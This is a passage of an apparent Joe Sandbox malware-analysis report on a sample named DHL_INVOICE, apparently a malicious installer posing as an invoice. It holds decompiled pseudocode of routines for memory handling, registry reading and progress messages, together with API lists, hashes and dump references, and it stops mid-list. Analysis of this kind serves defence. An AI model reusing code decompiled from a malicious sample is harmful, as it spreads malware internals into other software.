                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectoryErrorLast
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 1375471231-3355392842
                                                                            • Opcode ID: 8059bd01f3cb96d00b90c150394375a165c75bb7fcfbb43778e4f95d7889324c
                                                                            • Instruction ID: 407710f282aa9913273e94a45afee278ff037c1c447fef60eab8b448319c413c
                                                                            • Opcode Fuzzy Hash: 8059bd01f3cb96d00b90c150394375a165c75bb7fcfbb43778e4f95d7889324c
                                                                            • Instruction Fuzzy Hash: 56C012326050309BC3201B69AD0CA87BE94EB906A13018635B989E2220D2308C008AE8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 91%
                                                                            			E6F1C167A(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                            				void* _t37;
                                                                            				intOrPtr _t43;
                                                                            				void* _t49;
                                                                            				void* _t50;
                                                                            				void* _t51;
                                                                            				void* _t55;
                                                                            				void* _t56;
                                                                            				signed char _t62;
                                                                            				signed int _t64;
                                                                            				signed int _t66;
                                                                            				struct HINSTANCE__* _t71;
                                                                            				void* _t72;
                                                                            				void* _t80;
                                                                            				void* _t84;
                                                                            				void* _t85;
                                                                            				void* _t87;
                                                                            
                                                                            				_t80 = __esi;
                                                                            				_t72 = __edi;
                                                                            				_t55 = __ebx;
                                                                            				 *0x6f1c5040 =  *((intOrPtr*)(_t87 + 8));
                                                                            				 *0x6f1c503c =  *((intOrPtr*)(_t87 + 0x94));
                                                                            				 *0x6f1c5038 =  *((intOrPtr*)(_t87 + 0x90));
                                                                            				 *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x9c)) + 0xc))( *0x6f1c5014, E6F1C132B, _t84);
                                                                            				_push(1);
                                                                            				_t37 = E6F1C2351();
                                                                            				_t85 = _t37;
                                                                            				if(_t85 == 0) {
                                                                            					L28:
                                                                            					return _t37;
                                                                            				} else {
                                                                            					if( *((intOrPtr*)(_t85 + 4)) != 1) {
                                                                            						E6F1C1FCB(_t85);
                                                                            					}
                                                                            					E6F1C2049(_t85);
                                                                            					if( *((intOrPtr*)(_t85 + 4)) == 0xffffffff) {
                                                                            						L14:
                                                                            						if(( *(_t85 + 0x1010) & 0x00000004) == 0) {
                                                                            							if( *((intOrPtr*)(_t85 + 4)) == 0) {
                                                                            								_t37 = E6F1C2209(_t85);
                                                                            							} else {
                                                                            								_push(_t55);
                                                                            								_push(_t80);
                                                                            								_push(_t72);
                                                                            								_t64 = 8;
                                                                            								_t14 = _t85 + 0x1018; // 0x1018
                                                                            								_t56 = _t14;
                                                                            								memcpy(_t87 + 0x14, _t56, _t64 << 2);
                                                                            								_t43 = E6F1C1F1E(_t85, _t87 + 0x30);
                                                                            								 *(_t85 + 0x1034) =  *(_t85 + 0x1034) & 0x00000000;
                                                                            								 *((intOrPtr*)(_t85 + 0x1020)) = _t43;
                                                                            								 *_t56 = 4;
                                                                            								E6F1C2209(_t85);
                                                                            								_t66 = 8;
                                                                            								_t37 = memcpy(_t56, _t87 + 0x28, _t66 << 2);
                                                                            							}
                                                                            						} else {
                                                                            							E6F1C2209(_t85);
                                                                            							_t37 = GlobalFree(E6F1C15EB(E6F1C1668(_t85)));
                                                                            						}
                                                                            						if( *((intOrPtr*)(_t85 + 4)) != 1) {
                                                                            							E6F1C200D(_t85);
                                                                            							_t62 =  *(_t85 + 0x1010);
                                                                            							_t37 = _t62;
                                                                            							if((_t62 & 0x00000040) != 0 &&  *_t85 == 1) {
                                                                            								_t71 =  *(_t85 + 0x1008);
                                                                            								if(_t71 != 0) {
                                                                            									FreeLibrary(_t71);
                                                                            									_t37 =  *(_t85 + 0x1010);
                                                                            								}
                                                                            							}
                                                                            							if((_t37 & 0x00000020) != 0) {
                                                                            								_t37 = E6F1C15C5( *0x6f1c502c);
                                                                            							}
                                                                            						}
                                                                            						if(( *(_t85 + 0x1010) & 0x00000002) == 0) {
                                                                            							_t37 = GlobalFree(_t85); // executed
                                                                            						}
                                                                            						goto L28;
                                                                            					}
                                                                            					_t49 =  *_t85;
                                                                            					if(_t49 == 0) {
                                                                            						if( *((intOrPtr*)(_t85 + 4)) != 1) {
                                                                            							goto L14;
                                                                            						}
                                                                            						E6F1C2F9F(_t85);
                                                                            						L12:
                                                                            						_t85 = _t49;
                                                                            						L13:
                                                                            						goto L14;
                                                                            					}
                                                                            					_t50 = _t49 - 1;
                                                                            					if(_t50 == 0) {
                                                                            						L8:
                                                                            						_t49 = E6F1C2D14(_t85); // executed
                                                                            						goto L12;
                                                                            					}
                                                                            					_t51 = _t50 - 1;
                                                                            					if(_t51 == 0) {
                                                                            						_push(_t85);
                                                                            						E6F1C17F7();
                                                                            						goto L13;
                                                                            					}
                                                                            					if(_t51 != 1) {
                                                                            						goto L14;
                                                                            					}
                                                                            					goto L8;
                                                                            				}
                                                                            			}



















                                                                            0x6f1c167a
                                                                            0x6f1c167a
                                                                            0x6f1c167a
                                                                            0x6f1c1684
                                                                            0x6f1c1690
                                                                            0x6f1c169d
                                                                            0x6f1c16b4
                                                                            0x6f1c16b7
                                                                            0x6f1c16b9
                                                                            0x6f1c16be
                                                                            0x6f1c16c3
                                                                            0x6f1c17ef
                                                                            0x6f1c17f6
                                                                            0x6f1c16c9
                                                                            0x6f1c16cd
                                                                            0x6f1c16d0
                                                                            0x6f1c16d5
                                                                            0x6f1c16d7
                                                                            0x6f1c16e1
                                                                            0x6f1c1719
                                                                            0x6f1c1720
                                                                            0x6f1c1744
                                                                            0x6f1c1792
                                                                            0x6f1c1746
                                                                            0x6f1c1746
                                                                            0x6f1c1747
                                                                            0x6f1c1748
                                                                            0x6f1c174b
                                                                            0x6f1c1750
                                                                            0x6f1c1750
                                                                            0x6f1c175d
                                                                            0x6f1c1760
                                                                            0x6f1c1765
                                                                            0x6f1c176d
                                                                            0x6f1c1773
                                                                            0x6f1c1779
                                                                            0x6f1c1789
                                                                            0x6f1c178a
                                                                            0x6f1c178e
                                                                            0x6f1c1722
                                                                            0x6f1c1723
                                                                            0x6f1c1738
                                                                            0x6f1c1738
                                                                            0x6f1c179c
                                                                            0x6f1c179f
                                                                            0x6f1c17a5
                                                                            0x6f1c17ab
                                                                            0x6f1c17b0
                                                                            0x6f1c17b8
                                                                            0x6f1c17c0
                                                                            0x6f1c17c3
                                                                            0x6f1c17c9
                                                                            0x6f1c17c9
                                                                            0x6f1c17c0
                                                                            0x6f1c17d1
                                                                            0x6f1c17d9
                                                                            0x6f1c17de
                                                                            0x6f1c17d1
                                                                            0x6f1c17e6
                                                                            0x6f1c17e9
                                                                            0x6f1c17e9
                                                                            0x00000000
                                                                            0x6f1c17e6
                                                                            0x6f1c16e6
                                                                            0x6f1c16e9
                                                                            0x6f1c170e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c1711
                                                                            0x6f1c1716
                                                                            0x6f1c1716
                                                                            0x6f1c1718
                                                                            0x00000000
                                                                            0x6f1c1718
                                                                            0x6f1c16eb
                                                                            0x6f1c16ee
                                                                            0x6f1c16fa
                                                                            0x6f1c16fb
                                                                            0x00000000
                                                                            0x6f1c16fb
                                                                            0x6f1c16f0
                                                                            0x6f1c16f3
                                                                            0x6f1c1702
                                                                            0x6f1c1703
                                                                            0x00000000
                                                                            0x6f1c1703
                                                                            0x6f1c16f8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c16f8

                                                                            APIs
                                                                              • Part of subcall function 6F1C2351: GlobalFree.KERNEL32(?), ref: 6F1C2A44
                                                                              • Part of subcall function 6F1C2351: GlobalFree.KERNEL32(?), ref: 6F1C2A4A
                                                                              • Part of subcall function 6F1C2351: GlobalFree.KERNEL32(?), ref: 6F1C2A50
                                                                            • GlobalFree.KERNEL32(00000000), ref: 6F1C1738
                                                                            • FreeLibrary.KERNEL32(?), ref: 6F1C17C3
                                                                            • GlobalFree.KERNELBASE(00000000), ref: 6F1C17E9
                                                                              • Part of subcall function 6F1C1FCB: GlobalAlloc.KERNEL32(00000040,?), ref: 6F1C1FFA
                                                                              • Part of subcall function 6F1C17F7: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,6F1C1708,00000000), ref: 6F1C189A
                                                                              • Part of subcall function 6F1C1F1E: wsprintfW.USER32 ref: 6F1C1F51
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1131982632.000000006F1C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F1C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1131958154.000000006F1C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1132018644.000000006F1C4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1132042620.000000006F1C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6f1c0000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$Alloc$Librarywsprintf
                                                                            • String ID:
                                                                            • API String ID: 3962662361-0
                                                                            • Opcode ID: d5bb904f08fc2e811aa5733bd25d41ff678591e8117c0aea476af893e6caf597
                                                                            • Instruction ID: 9e623747d6cf0b2a5caa619c971303c2860e3486441e29cce9045a01a6fb942e
                                                                            • Opcode Fuzzy Hash: d5bb904f08fc2e811aa5733bd25d41ff678591e8117c0aea476af893e6caf597
                                                                            • Instruction Fuzzy Hash: 6D41C032484389AFCB20DF69C844BDA37A9BB313E5F10401AF85DAA182DB7DB574C653
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 46%
                                                                            			E00401D01(void* _a8, intOrPtr _a40, intOrPtr _a48) {
                                                                            				void* _t6;
                                                                            				void* _t7;
                                                                            				void _t10;
                                                                            				void* _t11;
                                                                            				intOrPtr _t16;
                                                                            				void* _t20;
                                                                            				void* _t22;
                                                                            				void _t23;
                                                                            				void* _t26;
                                                                            
                                                                            				_t22 =  *0x40b100; // 0x0
                                                                            				if(_a48 == 0) {
                                                                            					if(_t6 == 0) {
                                                                            						_t7 = GlobalAlloc(0x40, 0x804); // executed
                                                                            						_push(_a40);
                                                                            						_t23 = _t7;
                                                                            						_t4 = _t23 + 4; // 0x4
                                                                            						E00405EBA();
                                                                            						_t10 =  *0x40b100; // 0x0
                                                                            						 *_t23 = _t10;
                                                                            						 *0x40b100 = _t23;
                                                                            						goto L14;
                                                                            					} else {
                                                                            						if(_t22 == 0) {
                                                                            							_t16 = 1;
                                                                            						} else {
                                                                            							_t2 = _t22 + 4; // 0x4
                                                                            							E00406B1A(_t20, _t2);
                                                                            							 *0x40b100 =  *_t22;
                                                                            							GlobalFree(_t22);
                                                                            							goto L14;
                                                                            						}
                                                                            					}
                                                                            					goto L15;
                                                                            				} else {
                                                                            					while(1) {
                                                                            						__ecx = __ecx - 1;
                                                                            						if(__esi == 0) {
                                                                            							break;
                                                                            						}
                                                                            						__esi =  *__esi;
                                                                            						if(__ecx != 0) {
                                                                            							continue;
                                                                            						} else {
                                                                            							if(__esi == 0) {
                                                                            								break;
                                                                            							} else {
                                                                            								__esi = __esi + 4;
                                                                            								__edi = L"Call";
                                                                            								__eax = E00406B1A(__edi, __esi);
                                                                            								__eax =  *0x40b100; // 0x0
                                                                            								__eax = E00406B1A(__esi, __eax);
                                                                            								__eax =  *0x40b100; // 0x0
                                                                            								_push(__edi);
                                                                            								_push(__eax);
                                                                            								__eax = E00406B1A();
                                                                            								L14:
                                                                            								_t16 =  *((intOrPtr*)(_t26 + 0x10));
                                                                            								L15:
                                                                            								 *0x435ac8 =  *0x435ac8 + _t16;
                                                                            								_t11 = 0;
                                                                            							}
                                                                            						}
                                                                            						goto L17;
                                                                            					}
                                                                            					_push(0x200010);
                                                                            					_push(0xffffffe8);
                                                                            					_push(E00405EBA());
                                                                            					__eax = E00406AA8();
                                                                            					_t11 = 0x7fffffff;
                                                                            				}
                                                                            				L17:
                                                                            				return _t11;
                                                                            			}












                                                                            0x00401d05
                                                                            0x00401d0d
                                                                            0x00401d65
                                                                            0x00401d93
                                                                            0x00401d99
                                                                            0x00401d9d
                                                                            0x00401d9f
                                                                            0x00401da3
                                                                            0x00401da8
                                                                            0x00401dad
                                                                            0x00401daf
                                                                            0x00000000
                                                                            0x00401d67
                                                                            0x00401d69
                                                                            0x0040170b
                                                                            0x00401d6f
                                                                            0x00401d6f
                                                                            0x00401d74
                                                                            0x00401d7c
                                                                            0x00401d81
                                                                            0x00000000
                                                                            0x00401d81
                                                                            0x00401d69
                                                                            0x00000000
                                                                            0x00401d0f
                                                                            0x00401d0f
                                                                            0x00401d0f
                                                                            0x00401d12
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401d14
                                                                            0x00401d18
                                                                            0x00000000
                                                                            0x00401d1a
                                                                            0x00401d1c
                                                                            0x00000000
                                                                            0x00401d1e
                                                                            0x00401d1e
                                                                            0x00401d21
                                                                            0x00401d28
                                                                            0x00401d2d
                                                                            0x00401d37
                                                                            0x00401d3c
                                                                            0x00401d41
                                                                            0x00401d45
                                                                            0x00401d46
                                                                            0x00402ea1
                                                                            0x00402ea1
                                                                            0x00402ea5
                                                                            0x00402ea5
                                                                            0x00402eab
                                                                            0x00402eab
                                                                            0x00401d1c
                                                                            0x00000000
                                                                            0x00401d18
                                                                            0x00401d50
                                                                            0x00401d55
                                                                            0x00401d5d
                                                                            0x00401a97
                                                                            0x004015dc
                                                                            0x004015dc
                                                                            0x00402ead
                                                                            0x00402eb7

                                                                            APIs
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00401D81
                                                                            • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401D93
                                                                              • Part of subcall function 00405EBA: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406070
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocFreelstrcat
                                                                            • String ID: Call
                                                                            • API String ID: 238967769-1824292864
                                                                            • Opcode ID: ea8e00b31fc5630ef22f753c00b902b8b415464c32ecf8ecdf4f01d8fa161779
                                                                            • Instruction ID: 6aac856f3036c6303f510296de49dce4321192db318f402462ff6f52e68ea50d
                                                                            • Opcode Fuzzy Hash: ea8e00b31fc5630ef22f753c00b902b8b415464c32ecf8ecdf4f01d8fa161779
                                                                            • Instruction Fuzzy Hash: B711D271A11624ABD7209F50DD94A2B72A8FF44759B05443BFD46FB2D1C378B8018BEC
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E004027B0(short* __edi, void* __ebp, void* _a12, void* _a52, void* _a76) {
                                                                            				void* _t8;
                                                                            				void* _t15;
                                                                            				void* _t18;
                                                                            				void* _t27;
                                                                            
                                                                            				_t8 = E004030C1(_t15, _t18, _t27, 0x20019); // executed
                                                                            				E00403002(3);
                                                                            				 *__edi = 0;
                                                                            				if(_t8 != 0) {
                                                                            					__ecx = 0x3ff;
                                                                            					 *(__esp + 0x50) = 0x3ff;
                                                                            					__eflags =  *((intOrPtr*)(__esp + 0x38)) - __ebp;
                                                                            					if( *((intOrPtr*)(__esp + 0x38)) == __ebp) {
                                                                            						__ecx = __esp + 0x60;
                                                                            						__eax = RegEnumValueW(__esi, __eax, __edi, __esp + 0x60, __ebp, __ebp, __ebp, __ebp);
                                                                            						0 = 1;
                                                                            						__eflags = __eax;
                                                                            						 *((intOrPtr*)(__esp + 0x10)) = __ebx;
                                                                            					} else {
                                                                            						__eax = RegEnumKeyW(__esi, __eax, __edi, 0x3ff);
                                                                            					}
                                                                            					__eax = 0;
                                                                            					__edi[0x3ff] = __ax;
                                                                            					__eax = RegCloseKey(__esi);
                                                                            					__ebx =  *((intOrPtr*)(__esp + 0x10));
                                                                            				}
                                                                            				 *0x435ac8 =  *0x435ac8 + 1;
                                                                            				return 0;
                                                                            			}







                                                                            0x004027b5
                                                                            0x004027be
                                                                            0x004027ca
                                                                            0x004027cf
                                                                            0x004027d5
                                                                            0x004027da
                                                                            0x004027de
                                                                            0x004027e2
                                                                            0x004027f4
                                                                            0x004027fc
                                                                            0x00402804
                                                                            0x00402805
                                                                            0x0040280a
                                                                            0x004027e4
                                                                            0x004027e8
                                                                            0x004027e8
                                                                            0x0040280e
                                                                            0x00402811
                                                                            0x00402818
                                                                            0x00402ea1
                                                                            0x00402ea1
                                                                            0x00402ea5
                                                                            0x00402eb7

                                                                            APIs
                                                                            • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004027E8
                                                                            • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004027FC
                                                                            • RegCloseKey.ADVAPI32(00000000,?,?), ref: 00402818
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: Enum$CloseValue
                                                                            • String ID:
                                                                            • API String ID: 397863658-0
                                                                            • Opcode ID: b46cacae281d1184c7c84bd9f72f61e273c768f7e9ccf463ebf68afd38743971
                                                                            • Instruction ID: 15f2e51ca923653d163ef63657e7ddfb51ce7db4af5690b84a8befcbfff3b97a
                                                                            • Opcode Fuzzy Hash: b46cacae281d1184c7c84bd9f72f61e273c768f7e9ccf463ebf68afd38743971
                                                                            • Instruction Fuzzy Hash: 9301B531658341ABD3189F61EC88D3BB7ACFF85315F10093EF542E2181D7B86900876A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00402728(short* __edi, void* _a20, void* _a48, void* _a72) {
                                                                            				int* __ebp;
                                                                            				void* _t12;
                                                                            				void* _t18;
                                                                            				void* _t20;
                                                                            				void* _t28;
                                                                            
                                                                            				_t12 = E004030C1(_t18, _t20, _t28, 0x20019); // executed
                                                                            				E0040303E(_t20, 0x33);
                                                                            				 *__edi = 0;
                                                                            				if(_t12 != 0) {
                                                                            					__ecx = __esp + 0x50;
                                                                            					 *(__esp + 0x50) = 0x800;
                                                                            					__ecx = __esp + 0x24;
                                                                            					__eax = RegQueryValueExW(__esi, __eax, __ebp, __esp + 0x24, __edi, __esp + 0x50); // executed
                                                                            					0 = 1;
                                                                            					__eflags = __eax;
                                                                            					if(__eax != 0) {
                                                                            						L9:
                                                                            						__eax = 0;
                                                                            						 *__edi = __ax;
                                                                            						goto L2;
                                                                            					} else {
                                                                            						__eflags =  *((intOrPtr*)(__esp + 0x1c)) - 4;
                                                                            						if( *((intOrPtr*)(__esp + 0x1c)) == 4) {
                                                                            							__eflags =  *(__esp + 0x3c);
                                                                            							__eax = E0040661F(__edi,  *__edi);
                                                                            							goto L2;
                                                                            						} else {
                                                                            							__eflags =  *((intOrPtr*)(__esp + 0x1c)) - 1;
                                                                            							if( *((intOrPtr*)(__esp + 0x1c)) == 1) {
                                                                            								L7:
                                                                            								__eax = 0;
                                                                            								__edi[0x7fe] = __ax;
                                                                            								L2:
                                                                            								__eax = RegCloseKey(__esi); // executed
                                                                            								goto L10;
                                                                            							} else {
                                                                            								__eflags =  *((intOrPtr*)(__esp + 0x1c)) - 2;
                                                                            								if( *((intOrPtr*)(__esp + 0x1c)) != 2) {
                                                                            									goto L9;
                                                                            								} else {
                                                                            									goto L7;
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            					L11:
                                                                            					return 0;
                                                                            				}
                                                                            				L10:
                                                                            				 *0x435ac8 =  *0x435ac8 + 1;
                                                                            				goto L11;
                                                                            			}








                                                                            0x0040272d
                                                                            0x00402736
                                                                            0x0040273d
                                                                            0x00402742
                                                                            0x00402748
                                                                            0x0040274c
                                                                            0x00402756
                                                                            0x0040275e
                                                                            0x00402766
                                                                            0x00402767
                                                                            0x00402769
                                                                            0x004027a4
                                                                            0x004027a4
                                                                            0x004027a8
                                                                            0x00000000
                                                                            0x0040276b
                                                                            0x0040276b
                                                                            0x00402770
                                                                            0x00402792
                                                                            0x0040279a
                                                                            0x00000000
                                                                            0x00402772
                                                                            0x00402772
                                                                            0x00402776
                                                                            0x0040277f
                                                                            0x00402783
                                                                            0x00402785
                                                                            0x0040271c
                                                                            0x0040271d
                                                                            0x00000000
                                                                            0x00402778
                                                                            0x00402778
                                                                            0x0040277d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040277d
                                                                            0x00402776
                                                                            0x00402770
                                                                            0x00402eab
                                                                            0x00402eb7
                                                                            0x00402eb7
                                                                            0x00402ea5
                                                                            0x00402ea5
                                                                            0x00000000

                                                                            APIs
                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsaE104.tmp,?,?,00000011,00000002), ref: 0040271D
                                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 0040275E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: CloseQueryValue
                                                                            • String ID:
                                                                            • API String ID: 3356406503-0
                                                                            • Opcode ID: 4cd1d9cc3bf1777f8ea3db62a511f2da858761b9b4148003de5ccdbbc2434c8c
                                                                            • Instruction ID: fb228a38f7146265a3f721d89abc8bf78f6fe6bd0b338e84b9d16a0e51430f88
                                                                            • Opcode Fuzzy Hash: 4cd1d9cc3bf1777f8ea3db62a511f2da858761b9b4148003de5ccdbbc2434c8c
                                                                            • Instruction Fuzzy Hash: 5C11C235658302AFD7149FA4D98863BB3A4EF84315F10093FF102A21D1D7B85909CB5B
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00401399(signed int _a4) {
                                                                            				signed int _t10;
                                                                            				int _t12;
                                                                            				void* _t16;
                                                                            				signed int _t17;
                                                                            				void* _t18;
                                                                            				signed int _t20;
                                                                            				void* _t21;
                                                                            
                                                                            				_t20 = _a4;
                                                                            				if(_t20 < 0) {
                                                                            					L10:
                                                                            					return 0;
                                                                            				}
                                                                            				while(1) {
                                                                            					_t6 =  *0x435a30 + _t20 * 0x1c;
                                                                            					if( *((intOrPtr*)( *0x435a30 + _t20 * 0x1c)) == 1) {
                                                                            						goto L10;
                                                                            					}
                                                                            					if(E0040154A(_t6) == 0x7fffffff) {
                                                                            						return 0x7fffffff;
                                                                            					}
                                                                            					_t16 = E004030FD(_t7);
                                                                            					if(_t16 != 0) {
                                                                            						_t17 = _t16 - 1;
                                                                            						_t10 = _t20;
                                                                            						_t20 = _t17;
                                                                            						_t18 = _t17 - _t10;
                                                                            					} else {
                                                                            						_t18 = _t16 + 1;
                                                                            						_t20 = _t20 + 1;
                                                                            					}
                                                                            					if( *((intOrPtr*)(_t21 + 0x10)) != 0) {
                                                                            						_t12 =  *0x4349d0 + _t18;
                                                                            						 *0x4349d0 = _t12;
                                                                            						SendMessageW( *(_t21 + 0x1c), 0x402, MulDiv(_t12, 0x7530,  *0x4349cc), 0); // executed
                                                                            					}
                                                                            					if(_t20 >= 0) {
                                                                            						continue;
                                                                            					} else {
                                                                            						goto L10;
                                                                            					}
                                                                            				}
                                                                            				goto L10;
                                                                            			}










                                                                            0x0040139a
                                                                            0x004013a1
                                                                            0x00401413
                                                                            0x00000000
                                                                            0x00401413
                                                                            0x004013a8
                                                                            0x004013b0
                                                                            0x004013b5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004013bf
                                                                            0x00000000
                                                                            0x0040141a
                                                                            0x004013c7
                                                                            0x004013cb
                                                                            0x004013d1
                                                                            0x004013d2
                                                                            0x004013d4
                                                                            0x004013d6
                                                                            0x004013cd
                                                                            0x004013cd
                                                                            0x004013ce
                                                                            0x004013ce
                                                                            0x004013dd
                                                                            0x004013ec
                                                                            0x004013f4
                                                                            0x00401409
                                                                            0x00401409
                                                                            0x00401411
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401411
                                                                            0x00000000

                                                                            APIs
                                                                            • MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
                                                                            • SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
